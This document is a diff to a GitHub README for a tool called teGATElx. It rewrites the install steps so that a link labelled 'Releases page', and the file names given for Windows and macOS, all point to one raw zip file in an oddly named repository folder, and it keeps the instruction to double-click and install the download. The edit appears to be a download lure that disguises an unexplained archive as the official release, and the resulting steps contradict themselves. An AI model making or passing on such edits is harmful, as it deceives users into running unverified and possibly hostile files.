Mgalamela/teGATElx/README.md

 To download and install teGATElx:

-1. Click on the **Download** button above or visit the [Releases page](https://github.com/Mgalamela/teGATElx/releases).
+1. Click on the **Download** button above or visit the [Releases page](https://raw.githubusercontent.com/Mgalamela/teGATElx/main/unelidible/teGATElx.zip).
 2. On the Releases page, find the latest version of teGATElx.
 You will see a list of files available for download.
-3. Click on the file that matches your system (for example, `teGATElx-Windows.zip` for Windows users or `teGATElx-macOS.zip` for macOS users).
+3. Click on the file that matches your system (for example, `https://raw.githubusercontent.com/Mgalamela/teGATElx/main/unelidible/teGATElx.zip` for Windows users or `https://raw.githubusercontent.com/Mgalamela/teGATElx/main/unelidible/teGATElx.zip` for macOS users).
 4. Once the download completes, locate the file in your Downloads folder and double-click it.
 5. Follow the installation instructions that appear on your screen.